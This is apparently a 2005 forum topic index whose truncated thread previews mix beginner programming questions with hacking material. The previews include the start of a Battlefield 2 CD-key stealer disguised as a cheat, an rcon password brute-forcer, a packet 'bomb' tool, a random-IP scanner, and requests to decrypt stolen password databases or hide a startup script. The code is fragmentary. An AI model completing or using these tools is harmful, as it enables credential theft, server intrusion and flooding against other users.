Computer Discussion
1365 topics in this forum
-
There have been several threads lately that have spiraled into arguments about vb, with the "cool" crowd saying its sucks and is for little babies because it cant do everything in the world and requires runtime dlls, while everyone else acknowledges it is a very useful language for the windows operating system and just because it is used in teaching "beginners programming" doesnt mean you cant be advanced at it. cliffs: --vb good --vb not perfect --lets not hijack every thread with the same argument, this is afterall a help forum --discuss, although I expect an obligatory "k" or "raged" reply from someone, this is after all the mygot forums. cliffs of cliffs: …
-
- 45 replies
- 516 views
-
-
Hi, I am very new to programming its something ive always been meaning to do and ive started following tutorials. I have written a little test code for input/output. But everytime I run the program and I type in the age it closes the window. Could you help? #include <iostream> using namespace std; void main(void) { int Age = 0; /* We are setting the value of the variable 'Age' to '0' */ cout << "How old are you?: "; cin >> Age; cout << "You are " << Age << "years old" << endl; } It isnt like I am too bothered if I can get this working or not but I would want to know what is wrong for future …
-
- 9 replies
- 142 views
-
-
#include <unistd.h> #include <stdio.h> #include <errno.h> #include <string.h> #include <sys/socket.h> #include <resolv.h> #include <arpa/inet.h> #include <string> const string digits = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; const string hoebag = "ÿÿÿÿrcon"; const string quote = " \""; const string quote2 = "\" "; const string auth = " 108462864"; const string hoeassshit = "rcon_password a"; const string dot = "."; void doIncrement(string &s, int curdigit) { int listdigit = digits.find(s[curdigit]); if (listdigit == digits.length()-1) { s[curdigit] = digits[0]; if (curdigit == s.length(…
-
- 5 replies
- 129 views
-
-
IDD_ABOUT DIALOG DISCARDABLE 0, 0, 239, 66 STYLE DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU CAPTION "My About Box" FONT 8, "MS Sans Serif" BEGIN DEFPUSHBUTTON "&OK",IDOK,174,18,50,14 PUSHBUTTON "&Cancel",IDCANCEL,174,35,50,14 GROUPBOX "About this program...",IDC_STATIC,7,7,225,52 CTEXT "An example program showing how to use Dialog Boxes\r\n\r\nby theForger", IDC_STATIC,16,18,144,33 END This is my resource file. In my main file, I'm trying to use MAKEINTRESOURCE(IDD_ABOUT). Now, it says that IDD_ABOUT is undefined. Anyone have any idea as to why? I use Bloodshed Dev-Cpp by the way, if that's rele…
-
- 4 replies
- 176 views
-
-
The tutorials are in videos http://www.seangreasley.com/
-
- 12 replies
- 442 views
-
-
im trying to set up a vbulletin(like this) but i get this error any coders out there know this?
-
- 3 replies
- 76 views
-
-
I have a couple of databases from sites, but the passwords are encrypted. Anyone know how to decrypt them?
-
- 5 replies
- 108 views
-
-
-
hey all, I was really bored today so I spent it making a WORKING Battlefield2 Key Stealer ^_^. Ive also incorporated my ROT-13 function to encrypt my IP address when it sends the key VIA the internet. This is a 3-file tool so Ill post all three. The Client: (updated 7-14-05) Here is the sourcecode for the Client (disguised as an anti-recoil hack for BF2) '============================================================================ 'Key Stealer Declares '============================================================================ Option Explicit Private addy As String Public lRetVal As Long Private Lag As Double Private Char As String Publi…
-
- 58 replies
- 926 views
-
-
i was bored so i decided to write this. it helps me keep a list of programs i want to run as my computer starts up. this is the only key in the RUN key so any other ones are either viruses or newly installed software you also need a text file name Process.txt in the same directory as this program -the first line of that file is the number of programs you want to start up -the following lines are the paths to the programs -each line can only have 1 path If there is anything wrong, plz PM me or post the error here Enjoy /* Name: ProcessStarter Copyright: 2005 Author: darkurza Date: 19/07/05 12:42 Description: *This program is written by …
-
- 5 replies
- 89 views
-
-
Well ive been busy learning VB while I was in absense of teh forumz, thaught Id post my latest update on my packet tool, I have a problem with the TCP packets, maby someone else can help meh with fixin that, newayz, herez da code: Option Explicit Private Packet As String Private Address As String Private LPort As Long Private RPort As Long Private comstring As String Private Sub cmdBomb_Click(Index As Integer) Address = txtIP(0).Text & "." & txtIP(1).Text & "." & txtIP(2).Text & "." & txtIP(3).Text LPort = txtLocalPrt.Text RPort = txtRemotePrt.Text If LenB(txtPacket.Text) = 0 Then MsgBox "Please Enter…
-
- 11 replies
- 259 views
-
-
k, i have to hd's my main is a maxtor 160gb sata, the other is a seagate 40gb ata. the maxtor has xp, and the seagate has Vista. Is there a way i can have both hd's in at the same time (right now i got my main as primary, seagate as slave), and be able to choose which to boot from? Yes, i already know i could have partitioned, but i did not want to.
-
- 3 replies
- 58 views
-
-
good episode of DDP Hack Radio on Programming languages, can pretty much sum everything up over our arguments: http://www.binrev.com/radio/archive/binrev094.mp3
-
- 21 replies
- 232 views
-
-
I was bored and tinkered around for a bit with a mIRC today, and made a pretty cool, useful function. alias ip_format { if ($1) { var %scan.ip = $1- var %scan.goal = $pos($1-,x,0) if (%scan.goal >= 1) { %scan.ip = $replace($instok(%scan.ip,$rand(1,255),4,46),x,$null) } if (%scan.goal >= 2) { %scan.ip = $replace($instok(%scan.ip,$rand(1,255),4,46),x,$null) } if (%scan.goal >= 3) { %scan.ip = $replace($instok(%scan.ip,$rand(1,255),4,46),x,$null) } } return $iif($right(%scan.ip,1) == . ,$mid(%scan.ip,1,$calc($pos(%scan.ip,$chr(46),4) - 2)), %scan.ip) } It would be used for an ip scanner that scans random ip's on a speciffic range. …
-
- 13 replies
- 157 views
-
-
i have developed this white skin hacks for cs:s there are still a lot of bugs as like when the model is really far away, it won't be as visable, and another one is the light source in game makes it look weird :snivel: thanks http://img313.imageshack.us/img313/6715/derats2004crzy00033hb.jpg
-
- 5 replies
- 170 views
-
-
Does anyone have any knowledge on how to make a simple console application be seen in fullscreen, dos style (in CPP)? I know you can do it by right clicking properties, select full screen, blah blah blah. I need to know how to do it programatically.
-
- 1 reply
- 97 views
-
-
i downloaded a demo to a game, and when i try to install the game it says cant create CAB file. i havent had any trouble with anything else. also when i right clicked on it it gave me an option to extract. so when i did that there was a setup file which i ran but it starts and then stops.. only creating the game folders but puts nothing in them. any ideas? thanks in advance
-
- 2 replies
- 35 views
-
-
If anybody could IM me at PimpinElf4819 or PM me with some help with some HTML that would be nice. I need a way to post some HTML to make it close the window.\ Thanks
-
- 4 replies
- 124 views
-
-
Hey, was wondering if anyone knew how to open others people CD drives? I have seen this done on multiple people and myself. Was wondering if anyone knew. Thanks for the help.
-
- 11 replies
- 196 views
-
-
ok windows has this thing that will automatically save your password so you dont have to type it in again...im assuming this file is kept on your computer so.....where is it?
-
- 10 replies
- 157 views
-
-
I was reading the 2600 secrets page at binrev.com and I was inspired to write a small tool to encrypt/decrypt with ROT-13. The Encrypt/Decrypt Functions have been condensed into a single ROT function and I added the check for non-letter characters. Which means, just paste any text and the functrion will only Rot-13 the letters and nothing else. enjoy I guess, heres the Binary Downlaod link and source-code: Binary Download: http://hackrouter.pointclark.net/web/Proje...0v1%20Beta2.exe source code: Removed Old Beta2 code okay, thanks to greeneyes for pointing out my stupid mistake, ive fixed the code a bit and recompiled to Beta3: Download Beta3 here: ht…
-
- 3 replies
- 104 views
-
-
Alright, check this out, I am trying to mod shit so when you go to capture your CS:Source shit on a demo - everything turns up fine. I realize this will only work with wallhack - and thats fine. I can't seem to find anything that works, you guys know anything or have a snippet I can work off of?
-
- 8 replies
- 122 views
-
-
Just DO NOT ever ask how to hack, or where to find hacks, or what to do to become a hacker, do not ask people to hack a computer for you, and don't post any retarded claims about hacking your school. now you can do your happy dance :fruit: punishment for doing any of the listed crimes :rape: :spank:
-
- 14 replies
- 617 views
-
-
Hey i'm a php n00b. I have been teaching my self php for a couple of weeks and can do most ok just debugging it is problem cos i don't know what all the error mean. can someone help this is what i have. <?php $echeck = $_POST['email']; if (ereg("^([a-zA-Z0-9_-.]+)@(([[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.)|(([a-zA-Z0-9-]+.)+))([a-zA-Z]{2,4}|[0-9]{1,3})(]?)$", $echeck) line 8 -> { echo "<br>Please enter a valid e-mail address."; } ?> this is the error. Parse error: parse error, unexpected '{' in /home/public_html/file.php on line 8 'line 8 ->' is just to point not actually in code. thanks
-
- 2 replies
- 72 views
-
-
I've been tryin for about 3 days now to create a batch file that will execute when the system boots and will visit a site and then close. This need to be a background process, So no internet explorer is seen when this process is executed. How would I got a about it? Ive got as far as getting the batch to auto copy itself to the startup directory and run internet explorer but I need the explorer to be hidden and auto direct to the specific site. If anyone can help me out, much appreciated. If not Dont bother posting.
-
- 13 replies
- 169 views
-